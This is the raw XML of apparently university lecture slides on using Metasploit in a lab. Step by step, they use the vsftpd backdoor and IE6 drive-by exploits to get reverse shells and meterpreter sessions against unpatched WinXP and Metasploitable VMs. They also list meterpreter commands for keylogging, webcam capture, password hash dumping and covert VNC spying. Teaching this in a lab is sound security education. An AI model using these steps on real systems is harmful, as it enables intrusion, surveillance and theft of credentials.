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321" r:id="rId10"/>
    <p:sldId id="324" r:id="rId11"/>
    <p:sldId id="290" r:id="rId12"/>
    <p:sldId id="322" r:id="rId13"/>
    <p:sldId id="323" r:id="rId14"/>
    <p:sldId id="292" r:id="rId15"/>
    <p:sldId id="315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16" r:id="rId25"/>
    <p:sldId id="301" r:id="rId26"/>
    <p:sldId id="302" r:id="rId27"/>
    <p:sldId id="303" r:id="rId28"/>
    <p:sldId id="304" r:id="rId29"/>
    <p:sldId id="305" r:id="rId30"/>
    <p:sldId id="306" r:id="rId31"/>
    <p:sldId id="319" r:id="rId32"/>
    <p:sldId id="307" r:id="rId33"/>
    <p:sldId id="320" r:id="rId34"/>
    <p:sldId id="308" r:id="rId35"/>
    <p:sldId id="318" r:id="rId36"/>
    <p:sldId id="309" r:id="rId37"/>
    <p:sldId id="310" r:id="rId38"/>
    <p:sldId id="311" r:id="rId39"/>
    <p:sldId id="312" r:id="rId40"/>
    <p:sldId id="313" r:id="rId41"/>
    <p:sldId id="31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261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90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13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449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21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629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655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113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17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436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96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17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681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795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499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315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3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869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85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659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89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3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793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574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316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888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316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1930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436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675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680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65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43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06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11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92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4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06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ecurelayer7.net/attacking-metasploitable-2-using-metasplo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f.edu/~czou/temp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pid7/metasploit-framework/wiki/How-to-use-a-reverse-shell-in-Metasplo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ensive-security.com/metasploit-unleashed/about-meterprete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ensive-security.com/metasploit-unleashed/meterpreter-basic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ecurity-updates/securitybulletins/2009/ms09-00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JH6BHVbZiPs&amp;list=PLyYk0ysrovkXv_ltYm1QQrd1dOLw0VItj&amp;index=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ecurity-updates/SecurityBulletins/2010/ms10-01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results?search_query=metasploit+attack+MS10-018" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=BL43nXM0vS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ppQMwoM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teshshah.github.io/linux/kali/how-to-fix-metasploit-database-not-connected-or-cache-not-buil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360362"/>
            <a:ext cx="7772400" cy="1697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br>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:latin typeface="AlBattar" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:latin typeface="AlBattar" charset="0"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="4000" dirty="0">
                <a:latin typeface="AlBattar" charset="0"/>
              </a:rPr>
              <a:t>Exploiting 2: Compromising Target by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="4000" dirty="0" err="1">
                <a:latin typeface="AlBattar" charset="0"/>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="4000" dirty="0">
                <a:latin typeface="AlBattar" charset="0"/>
              </a:rPr>
              <a:t> tool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CIS 6395, Incident Response Technologies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2021, Dr. Cliff Zou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czou@cs.ucf.edu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Other </a:t>
            </a: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Metasploit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 Attacks towards Metasploitable2 Linux VM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429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A good tutorial on other </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2800" dirty="0"/>
              <a:t> attacks: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400" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://blog.securelayer7.net/attacking-metasploitable-2-using-metasploit/</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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Demonstrate the following attacks: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Samba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Tomcat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err="1"/>
              <a:t>UnrealIRCD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06298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47800" y="2514600"/>
            <a:ext cx="740727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Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> to Exploit Vulnerable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>WinXP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>  Virtual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Up Vulnerable WinXP Virtual Machine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1: Download the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>WinXP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> VM from Microsoft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https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>developer.microsoft.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>/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-us/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>microsoft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>-edge/tools/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>vms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>/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Now </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>WinXP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> VM is not available on this site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>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Luckily, I have a version downloaded two years ago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2: Imported into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>VirtualBox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> and run it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3: Disable “automatic update” feature and disable “Windows Firewall”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4:  Remove ALL windows security patches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“control </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>panel”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>”add</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>/remove programs”  click “show update”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ym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Remove each security patch one-by-one!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More than 60 security patches, so be patient! It takes about 30 minutes to remove all security patches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Ignore all warnings during removal, and choose “do not restart now” option before finishing a removal to save time</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" alt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50627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68865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Up Vulnerable WinXP Virtual Machine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For your convenience, I have produced a vulnerable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>WinXP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t> VM for you to download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I use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>VirtualBox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> “File” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> “Export appliance” to generate a single .ova file of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>WinXP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> after removing all security patches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Download from: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ym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.cs.ucf.edu/~czou/temp/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About 1.3GB size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You can also download the original </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>WinXP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> VM image from the same place, and remove security patches by yourself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1325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Up Vulnerable WinXP Virtual Machine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>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Notes: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Do not use this Windows IE browser to browse Internet, otherwise your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>WinXP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> could be quickly compromised by “drive-by download” attack!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The original </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>WinXP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> VM will expire after 30 days, so this vulnerable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>WinXP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> VM image will also expire after 30 days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Although can still be used, but will be slow and annoying with many warning messages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28911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What Critical Vulnerabilities does This WinXP Have?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Simple approach:  Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> or Nessus!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6 critical vulnerabilities found by Nessus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The included IE8 may have additional vulnerabilities (will discuss later)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29210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1: Find attack module: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2: load the attack module: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3: load desired attack payload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4105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5854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08" y="5715000"/>
            <a:ext cx="805897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44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Good tutorial: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/rapid7/metasploit-framework/wiki/How-to-use-a-reverse-shell-in-Metasploit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Two popular shell payloads for most Windows exploits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Bind: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 dirty="0"/>
              <a:t>A bind shell is the kind that opens up a new service on the target machine, and requires the attacker to connect to it in order to get a session.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="16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Reverse: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 dirty="0"/>
              <a:t>it requires the attacker to set up a listener first on his box, the target machine acts as a client connecting to that listener, and then finally the attacker receives the shell.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="16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windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>upexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>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/>
              <a:t>Generate a Windows style command line shell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/>
              <a:t>Like running the “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>” under Windows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windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>bind_tcp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windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>reverse_tcp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69787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When to use a reverse shell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The target machine is behind a different private network.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The target machine's firewall blocks incoming connection attempts to your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>bindshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="20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Your payload is unable to bind to the port it wants due to whatever reason.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/>
              <a:t>In our </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>WinXP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0"/>
              <a:t> exploit, this </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>bind_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0"/>
              <a:t> module may not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You simply can't decide what to choose.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When a reverse shell isn't needed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if you can backdoor an existing service (already running on target), you may not need a reverse shell. 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89828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Content from the book:</a:t>
            </a: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“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The Basics of Hacking and Penetration Testing: Ethical Hacking and Penetration Testing Made Easy”, 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Popular shell payloads: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windows/upexec/reverse_tcp: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Generate a Windows style command line shell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Like running the “cmd” under Windows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windows/meterpreter/bind_tcp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windows/meterpreter/reverse_tcp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Meterpreter: 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More advanced shell, stealthy, powerful, and extensible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Tutorial: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/</a:t>
            </a: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Functions: reboot, shutdown, take screenshot, enable webcam, etc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1722938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How to set up for a reverse shell during payload generation?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b="1"/>
              <a:t>LHOST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t> - This is the IP address you want your target machine to connect to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If your machine is behind a NAT (such as Wifi router), set LHOST to be your NAT’s global IP, and configure NAT to do port forwarding to your attack machine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b="1"/>
              <a:t>LPORT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t> - This the port you want your target machine to connect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If you want the reverse shell connect to another machine (listener), set LHOST and LPORT to the listener, and make sure the listener has started first before executing the reverse shell.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288496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4: Find out what missing parameters in options that need to fill in  (show options)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5: Fill in missing options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962150"/>
            <a:ext cx="7272337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6276975"/>
            <a:ext cx="490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386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5: Execute exploit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Under </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>, type “help” to see all commands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good tutorial on using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>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hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/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6534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92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Powerful Meterpreter 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Meterpreter supports all existing Linux commands, and provides more powerful commands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Example of interesting commands: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err="1"/>
              <a:t>Sysinfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>:  show computer system information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File download/upload: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/>
              <a:t>Meterpreter&gt;download            upload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Kill:   kill a process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err="1"/>
              <a:t>keyscan_start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>:  Start capturing keystrokes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err="1"/>
              <a:t>keyscan_stop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>  Stop capturing keystrokes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keyscan_dump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>:   Dump the keystroke buffer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Screenshot:     Grab a screenshot of the interactive desktop (image is saved in local computer)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record_mic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>:     Record audio from the default microphone for X seconds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webcam_snap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>:    Take a snapshot from the specified webcam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Hashdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>:      Dumps the contents of the SAM database (password database)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69654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Remote Desktop Payload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windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>vncinject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>reverse_tcp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windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>vncinject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>bind_tcp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Inject a VNC server remotely, and can have the display thrown back to the attacker’s host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Users of the target system user will not notice that their display is being shared  when in View Only mode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VNCviewer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> must be installed on the host system to see the VNC session thrown back by the target system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 dirty="0"/>
              <a:t>Kali Linux has already installed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>VNCviewer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="16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23488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Remote Desktop Payload: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4008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7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14338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06375" y="914400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Remote Desktop Payload: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You will be able to spy on remote target’s user activities!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But, you cannot operate on remote computer, because one setting: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ViewOnly              true            no        Runs the viewer in view mode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Change this option as:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>set ViewOnly false</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>, then you can operate as a remote desktop on target machine!</a:t>
            </a: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36888"/>
            <a:ext cx="79787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19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Metasploit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 Attack: MS09-001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Let us move on to the next MS number: MS09-001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SMB Could Allow Remote Code Execution (958687):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1800" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://docs.microsoft.com/en-us/security-updates/securitybulletins/2009/ms09-001</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>youtube</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> tutorial: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1200" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.youtube.com/watch?v=JH6BHVbZiPs&amp;list=PLyYk0ysrovkXv_ltYm1QQrd1dOLw0VItj&amp;index=3</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="12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465513"/>
            <a:ext cx="47926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260350" y="3798888"/>
            <a:ext cx="3230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Metasploit only has an attack module to crash the remote Windows, but it is not successful in my trial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28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Metasploit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 Attack: MS10-018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Let us move on to the next vulnerable MS number: MS10-018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This module exploits a use-after-free vulnerability within the DHTML behaviors functionality of Microsoft Internet Explorer version 6 and 7.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Advisory: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2010/ms10-018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err="1"/>
              <a:t>Youtube</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> tutorial on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> attack this bug: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hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.youtube.com/watch?v=BL43nXM0vSI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hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://www.youtube.com/results?search_query=metasploit+attack+MS10-018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This is an example of “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Drive-by Download</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>” attack to vulnerable Internet browser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37166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Vulnerable Linux: metasploitable2 Linux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It will be the target for our exploiting test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First, start running this metasploitable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Then, run Nessus on Kali or your host to scan this vulnerable Linux to find critical vulns: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The Metasploitable2 has 10 “critical” vulns. We first use the “vsftpd” vulnerability to demonstrate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694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53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Attack scenario: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/>
              <a:t>Target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>WinXP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" dirty="0"/>
              <a:t> with vulnerable IE6:   10.0.2.6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/>
              <a:t>Attack Kali Linux:  10.0.2.15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2273105"/>
            <a:ext cx="78390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4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143001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Set payload and fill in missing parameters in ‘options’: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/>
              <a:t>SRVHOST specifies which IP address should the malicious web server set up on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/>
              <a:t>SRVPORT specifies the listening port for the malicious website, you can change it to be 80 to make the traffic look like a normal web traffic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91613"/>
            <a:ext cx="7372350" cy="40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46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11430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Since we use “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>” payload, we need to set LHOST to specify the reverse connect-back IP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Set Local server’s IP address and service port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SRVHOST,  SRVPORT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So that a local malicious Web server will run after the exploit has been executed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48000"/>
            <a:ext cx="559904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3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‘Exploit’ command will generate the malicious webserver, and tell you which URL should be sent to victim in order to trick victim to use (such as included in a spam email)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In above example, attacker needs to lure a victim to browse URL: http://10.0.2.15:8080/RgeUtk5dw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523124"/>
            <a:ext cx="8201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7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When a vulnerable IE6 connects to this webserver on the specified URL, the IE6 will shut down without any error message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And on the attacker side, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> generated a new Meterpreter session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8915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36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You can start to use this generated </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> session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905000"/>
            <a:ext cx="8724900" cy="334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520104"/>
            <a:ext cx="4962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97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MS10-046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/>
              <a:t>This vulnerability is also IE’s bug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/>
              <a:t>Another example of IE6 vulnerable to ‘Drive-By Download’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/>
              <a:t>“excellent” means even better exploit than previous MS10-018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3366311"/>
            <a:ext cx="8791575" cy="34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1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MS10-046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/>
              <a:t>This vulnerability is also IE’s bug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676400"/>
            <a:ext cx="6429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8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MS10-046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3048000"/>
            <a:ext cx="8229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When the vulnerable IE6 connects to the malicious webserver (http://10.0.2.15),  it will be compromised </a:t>
            </a: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80307"/>
            <a:ext cx="63341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1" y="4191001"/>
            <a:ext cx="9144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17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MS10_002_aurora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/>
              <a:t>This vulnerability is also IE6’s bug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/>
              <a:t>Another example of IE6 vulnerable to ‘Drive-By Download’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783713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8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Comprehensive Penetration Testing Software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Already installed in Kali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Command line: #msfconsole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A good Youtube tutorial on compromising Metasploitable:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.youtube.com/watch?v=UKppQMwoMdk</a:t>
            </a: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1:  search for exploit module to vsftpd vuln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search vsftpd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Rank:  “great” or “excellent” are good candidates for attack!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648200"/>
            <a:ext cx="83232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89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MS10_002_aurora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295400"/>
            <a:ext cx="7105650" cy="3743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73" y="5495925"/>
            <a:ext cx="46863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4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MS10_002_aurora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481013" y="1143000"/>
            <a:ext cx="8229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When the vulnerable IE6 connects to the malicious webserver with the specific URL (http://10.0.2.15:8080/Qik8mzO),  it will be compromised </a:t>
            </a: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166937"/>
            <a:ext cx="8020050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4800600"/>
            <a:ext cx="589796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5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2:  use the exploit module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use exploit/unix/ftp/vsftpd_234_backdoor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3:  Choose attacking payload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Meaning: remote shell? Remote desktop (vnc)? Remote ftp? Remote execute a command?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show payloads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446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81089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584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4:  set payload to use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exploit(vsftpd_234_backdoor) &gt; set payload cmd/unix/interact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5: fill in missing parameters before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Remote IP? Local IP? Local port? ….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show options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Result: RHOST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Is missing, we need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To specify remote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Host IP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47875"/>
            <a:ext cx="5648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41675"/>
            <a:ext cx="4495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393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62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7:  Filling in missing parameters/options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exploit(vsftpd_234_backdoor) &gt; set RHOST 192.168.0.109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8: Issue Attack!</a:t>
            </a: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exploit(vsftpd_234_backdoor) &gt; exploit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Now we have a remote shell on the target with root previllege!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352800"/>
            <a:ext cx="84772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078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429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Now you can try the other 10 critical vulnerabilities in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>Metasploitable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>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Summary of Operations of Metasploit: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Use Nmap or Nessus to find target vulnerabilities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 b="1" dirty="0"/>
              <a:t>Search</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> the exploit module for the vulnerability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 b="1" dirty="0"/>
              <a:t>Use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> the attack module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 dirty="0"/>
              <a:t>Show available payloads in the exploit module (</a:t>
